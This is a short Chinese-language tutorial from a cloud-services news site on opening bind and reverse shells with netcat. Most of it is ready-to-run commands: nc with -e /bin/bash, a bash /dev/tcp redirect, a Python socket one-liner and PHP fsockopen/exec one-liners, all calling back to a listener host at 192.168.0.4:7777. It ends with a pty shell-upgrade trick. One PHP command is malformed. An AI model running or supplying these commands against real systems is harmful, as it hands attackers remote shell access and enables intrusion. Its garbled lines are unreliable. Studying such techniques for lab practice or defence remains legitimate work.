溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

NC實現(xiàn)反彈shell的幾種方法

發(fā)布時間:2020-10-27 17:03:35 來源:億速云 閱讀:523 作者:Leah 欄目:開發(fā)技術(shù)

NC實現(xiàn)反彈shell的幾種方法?很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細(xì)講解,有這方面需求的人可以來學(xué)習(xí)下,希望你能有所收獲。

正向反彈shell

ubuntu或者CentOS上面輸入

nc -lvp 7777 -e /bin/bash

kali上輸入

nc ip 7777

正向反彈是目標(biāo)機(jī)先執(zhí)行nc命令,然后kali上再進(jìn)行nc監(jiān)聽,即可反彈shell。

需要目標(biāo)機(jī)安裝nc。

反向反彈shell

方法1:bash反彈

bash -i >& /dev/tcp/ip/port 0>&1

但首先需要在kali上使用nc監(jiān)聽端口:

nc -lvp 7777

此方法在ubuntu下不會反彈成功,CentOS可以反彈成功。

方法2:python反彈

反彈shell的命令如下:

復(fù)制代碼 代碼如下:
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

首先,使用nc在kali上監(jiān)聽端口:

nc -lvp 7777

在CentOS或者ubuntu下使用python去反向連接,輸入:

復(fù)制代碼 代碼如下:
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);

此方法ubuntu和Linux均反彈成功。

方法3

首先在kali上輸入nc監(jiān)聽:

nc -lvp 7777

在CentOS或者ubuntu 上使用nc去反向連接,命令如下:

nc -e /bin/bash 192.168.0.4 7777

方法4:php反彈shell

首先在kali上輸入:

nc -lvp 7777

然后在目標(biāo)機(jī)上輸入:

php- 'exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")'


php -r '$sock=fsockopen("192.168.0.4",7777);exec("/bin/bash -i 0>&3 1>&3 2>&3");'

注意php反彈shell的這些方法都需要php關(guān)閉safe_mode這個選項,才可以使用exec函數(shù)。

 遇到反彈后不是正常的shell,可用命令:

python -c 'import pty;pty.spawn("/bin/bash")'

轉(zhuǎn)化為常規(guī)的shell。

看完上述內(nèi)容是否對您有幫助呢?如果還想對相關(guān)知識有進(jìn)一步的了解或閱讀更多相關(guān)文章,請關(guān)注億速云行業(yè)資訊頻道,感謝您對億速云的支持。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI